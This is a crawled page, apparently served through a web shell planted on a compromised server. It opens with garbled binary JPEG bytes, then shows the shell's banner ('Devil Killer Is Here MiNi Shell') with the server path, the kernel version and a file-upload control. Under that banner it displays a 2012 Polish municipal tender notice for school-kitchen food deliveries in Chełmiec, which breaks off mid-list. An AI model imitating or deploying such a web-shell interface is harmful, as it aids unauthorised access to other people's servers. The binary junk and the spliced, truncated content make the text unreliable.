JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120207/36644-N-2012.html

<p class="kh_header"><b>Chełmiec: Realizacja programu wieloletniego: Pomoc państwa w zakresie dożywiania na rok 2012 - Dostawy żywności dla potrzeb kuchni centralnej w Gminie Chełmiec</b><br>
<b>Numer ogłoszenia: 36644 - 2012; data zamieszczenia: 07.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej , ul. Papieska 2, 33-395 Chełmiec, woj. małopolskie, tel. 0-18 4145631, faks 0-18 4145643.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chelmiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja programu wieloletniego: Pomoc państwa w zakresie dożywiania na rok 2012 - Dostawy żywności dla potrzeb kuchni centralnej w Gminie Chełmiec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest sukcesywna dostawa artykułów spożywczych na potrzeby stołówki szkolnej z podziałem na następujące pakiety:
Pakiet 1 - Mięso i przetwory
Pakiet 2 - Drób i przetwory
Pakiet 3 - Jaja
Pakiet 4 - Nabiał
Pakiet 5 - Artykuły sypkie
Pakiet 6 - Ryby
Pakiet 7 - Pieczywo
Pakiet 8 - Mrożonki warzywne i owocowe
Pakiet 9 - Warzywa i owoce
Pakiet 10 - Ziemniaki
Pakiet 11 - Cukier
Pakiet 12 - Pozostałe art. spożywcze
Pakiet 13 - Przyprawy
Pakiet 14 - Makarony
2. Szczegółowy opis przedmiotu zamówienia dotyczący asortymentu w poszczególnych pakietach został zawarty w formularzach ofertowych /Załączniki Nr 1 do SIWZ/
3. Ilość przedmiotu zamówienia w poszczególnych pozycjach formularza ofertowego podana jest szacunkowo. Ilość ta może ulegać zmianom w trakcie realizacji umowy.
4. W przypadku zrealizowania mniejszej wartości lub ilości przedmiotu zamówienia, Wykonawcy nie przysługują żadne roszczenia w stosunku do Zamawiającego.
5. W przypadku zmiany potrzeb, Zamawiający przewiduje możliwość zmiany ilości poszczególnych asortymentów z zastrzeżeniem że suma wartości poszczególnych części umowy pozostanie bez zmian.
6. Zamawiający dopuszcza możliwość zastosowania towaru równoważnego tzn. posiadającego nie gorszy skład/wartości odżywcze niż określone przez Zamawiającego.

Dodatkowe wymagania:
a) Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia, wymagana jest należyta staranność przy realizacji zobowiązań umowy,
b) Wykonawca zobowiązany jest dostarczać towar I klasy jakości, świeży, spełniający normy jakościowe (PN) dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej
c) Każdy z produktów musi być dopuszczony do obrotu i sprzedaży zgodnie z obowiązującymi przepisami, oraz z warunkami określonymi w SIWZ, oraz musi posiadać aktualny termin przydatności do spożycia
d) Zapłata za dostarczony towar realizowana będzie w formie przelewu na konto wykonawcy podane na rachunku w ciągu do 21 dni od daty otrzymania faktury
e) Wykonawca zobowiązuje się do bezpłatnego dowozu towaru do magazynu zamawiającego wskazanego w zamówieniu, własnym transportem zgodnie z wymogami rozporządzenia (WE) nr 853/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz.U. z 2006r nr 171 poz. 1225) i rozporządzenia (WE) nr 852 /2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004r w sprawie higieny środków spożywczych (DZ.U. UE L 139 z 30 kwietnia 2004r, str.1 , Dz U UE Polskie wydanie specjalne rozdz. 13, t.34).
f) Wykonawca zabezpieczy należycie towar na czas przewozu /opakowania, pojemniki przystosowane do przewozu danego asortymentu/ i ponosi całkowitą odpowiedzialność za dostawę i jakość dostarczanego towaru. Odpowiedzialność za braki i wady powstałe w czasie transportu wyrobów ponosi Wykonawca.
g) Ilościowy i jakościowy odbiór towaru będzie dokonywany przez zamawiającego w jego magazynie w oparciu o obowiązujące normy jakościowe, złożone zamówienie oraz fakturę. Odpowiedzialność za dostarczony i odbierany towar określa moment odbioru /przekazania/ towaru. Wykonawca zobowiązany jest dołączyć do dostarczonego towaru fakturę VAT (oryginał) + kopię.
5.4. W przypadku dostarczenia towaru:
a) z wadami jakościowymi - zamawiający może odmówić jego przyjęcia i żądać wymiany na towar wolny od tych wad;
b) środkiem transportu nie spełniającym wymagań sanitarnych zamawiający może odmówić jego przyjęcia;
c) który jest niezgodny ze złożonym na zapotrzebowaniu asortymentem i ilością - zamawiający może odmówić przyjęcia dostawy;
d) z opóźnieniem w terminie dostawy - zamawiający może odmówić jego przyjęcia;
e) z wadami jakościowymi ukrytymi, stwierdzonymi /okres przydatności do spożycia/podczas jego magazynowania, zamawiający zwróci go do dyspozycji wykonawcy (na jego koszt), powiadamiając go niezwłocznie telefonicznie o stwierdzonych wadach oraz potwierdzi to przesłaniem protokołu reklamacyjnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>rozpatrywane będą oferty, w których wykonawca oświadczy o posiadaniu uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>rozpatrywane będą oferty, w których  wykonawca oświadczy o posiadaniu wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca załączy do oferty wykaz środków transportu przeznaczonych do przewozu art. spożywczych wraz z dołączeniem dokumentów (decyzji, zezwoleń), potwierdzających dopuszczenie pojazdu do przewozu artykułów żywnościowych (załącznik nr 4 do SIWZ) .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>rozpatrywane będą oferty, w których Wykonawca oświadczy o dysponowaniu osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>rozpatrywane będą oferty, w których wykonawca oświadczy, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty tylko i wyłącznie w sytuacji gdy konieczność wprowadzenia takiej zmiany wynikać będzie z sytuacji, której nie można było wcześniej przewidzieć lub gdy zmiana ta będzie korzystna dla zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chelmiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Papieska 2, 33-395 Chełmiec, pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2012 godzina 09:45, miejsce: ul. Papieska 2, 33-395 Chełmiec, dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I - MIĘSO I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: MIĘSO I PRZETWORY, Wieprzowina, schab bez kości kg 200, Wieprzowina, łopatka bez kości
kg 700, Wieprzowina, boczek bez kości kg 100, Wołowina, rostbef bez kości kg 250, Kiełbasa typ toruńska kg 180, 
Warunki:
- mięsa nieprzetworzone winny być dostarczone świeże, tzn. nie mrożone!
- termin przydatności do spożycia mięs i przetworów nie może być krótszy niż 5 dni
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II - DRÓB I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru:
DRÓB I PRZETWORY, Mięso z piersi kurczaka kg 580, Mięso z piersi indyka kg 440, Udko z kurczaka (min 225g - 275g, bez skóry) szt 3200, Mięso drobiowe, porcja rosołowa kg 160, Kurczak, mięso gulaszowe kg 320, Warunki:
- mięsa nieprzetworzone winny być dostarczone świeże, tzn. nie mrożone!
- termin przydatności do spożycia mięs i przetworów nie może być krótszy niż 5 dni
Oświadczamy, że:
Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III - JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: Jaja rozmiar XL
szt 4400 
Warunki:
- termin przydatności do spożycia nie może być krótszy niż 21 dni
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty dostarczenia faktury
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet IV- NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru:
1 Jogurt owocowy z dużymi kawałkami owoców, 1.5 % tłuszczu. Smak : truskawkowy, poziomkowy, bananowy, brzoskwiniowy. Waga : 150 g.
szt 3200, 2 Jogurt naturalny, 2 % tłuszczu l 64, 3. Mleko spożywcze UHT, 2 % tłuszczu l 320, 4. Ser żółty, typ gouda kg 40, 5. Serek homogenizowany waniliowy, 150 g szt 3200, 6. Śmietana, 15 % tłuszczu. Połączenie  mleka i tłuszczów roślinnych. Nie zawiera cholesterolu; jest niskokaloryczna. Uniwersalna receptura, która powoduje,że nadaje się do przygotowania zarówno ciepłych jak i zimnych dań l 50, 7. Śmietana kremówka, 30 % tłuszczu l 96, 8. Pudding czekoladowy. Budyń o smaku czekoladowym z sosem o smaku waniliowym ( 36 % ). Waga 500 g. opakowanie : 4 szt. / 125 g szt 800. 
Warunki:
- termin przydatności do spożycia nie może być krótszy niż:
1. jogurt, śmietany - 14 dni
2. mleko - 3 miesiące
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury przez Zamawiającego
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet V- ARTYKUŁY SYPKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: ARTYKUŁY SYPKIE, 1. Bułka tarta kg 190, 2. Kasza jęczmienna, perłowa kg 380, 3. Mąka pszenna, typ 750 kg 220, 4. Ryż biały długoziarnisty kg 860, 5. Sól kg 200, 
Warunki:
- termin przydatności do spożycia nie może być krótszy niż 60 dni
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet VI- RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru:
RYBY, 1. Filet z mintaja mrożony, gatunek I, maksymalnie 10 % oblodzenia
kg 544, 2 Filet z pangi mrożony, gatunek I, maksymalnie 10 % oblodzenia
kg 448
Warunki:
- gat. I
- ryby mrożone nie glazurowane, oblodzenie max do 10%
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet VII- PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet VII- PIECZYWO
W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: PIECZYWO, 1. Bułka grahamka 100g szt 6400, 2. Bułka pszenna zwykła 100g, szt 3200, 3. Chleb zwykły krojony 600g szt 464, 4. Chleb graham krojony 600g szt 960, 5. Kapuśniaczek 100g szt 3200, 6. Groszek ptysiowy kg 32 
Warunki:
- dostawa pieczywa do godz. 05:00 - 06:00
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet VIII- MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: MROŻONKI
1. Brokuły, róża 50 / 80 mm, KG,380, 2. Dynia, kostka 10 / 10 mm KG 240, 3 Kalafior, róża 50 / 80 mm KG 480, 4. Groszek zielony, KG, 64, 5. Mieszanka warzywna uniwersalna : marchew, groszek, kalafior, por, seler, papryka czerwona, fasolka zielona, fasolka żółta, kukurydza KG 320, 
Warunki:
- Dostarczony towar musi być wysokiej jakości, głęboko zamrożony
Oświadczamy, że:
- Zrealizujemy każdorazowo zamówienie w terminie 24 godz. od czasu złożenia zamówienia, własnym transportem, na własny koszt
- Termin płatności: do 21 dni od daty otrzymania faktury
- Towar dostarczymy we wskazane miejsce przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet IX- WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zamówienia oferujemy dostawę niżej zamówionego towaru: WARZYWA I OWOCE, 1. Jabłko kg 840, 2. Banan kg 1524, 3. Burak kg 512, 4. Cebula biała 
kg 688, 5 Chrzan kg 30, 6. Czosnek szt 40, 7.Cytryna kg 160, 8. Kapusta czerwona
kg 412, 9. Kapusta kwaszona kg 264, 10. Kapusta pekińska kg 284, 11. Kapusta biała
